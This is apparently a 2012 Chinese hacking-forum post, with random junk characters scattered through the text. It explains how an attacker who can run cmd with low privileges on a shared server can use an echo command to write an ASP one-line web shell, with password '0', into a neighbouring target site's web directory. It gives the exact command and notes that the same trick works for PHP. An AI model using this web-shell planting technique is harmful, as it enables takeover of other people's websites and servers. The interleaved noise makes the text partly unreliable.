在旁注过程中,可以执行cmd而权限又比较低的情况下,有时候可以用这个方法帮你拿下目标站。- u1 N# O' \) z. e& }0 M/ n# v
$ o& D4 T+ \0 q" g0 `4 X) D+ E命令格式' N1 {# |; S1 y
8 L. J2 r2 V& D- [' A+ W
Echo 语句 >目标站绝对目录
7 A8 Y' B* k8 R, m2 ?3 x) Y; q& r* V' x; S4 Z- j4 R4 j9 l
例如:
/ @( T. e% l z7 P# h- \* i# O& Q6 V+ l1 w. i0 ~
echo ^<^%execute request("0")%^> >D:\03389.com\wwwroot\YingMu.asp6 E$ M8 a6 N! U/ K8 o# R3 U/ t
5 y+ r7 m8 @( X
这样访问目标站的目录下就会生成一个密码为0的asp的一句话,此方法在PHP等脚本语言均适用,大家灵活发挥。
) L5 b/ y/ k' l$ p" s/ \6 ? |
发表于 2012-9-23 14:40:24
收藏
支持
反对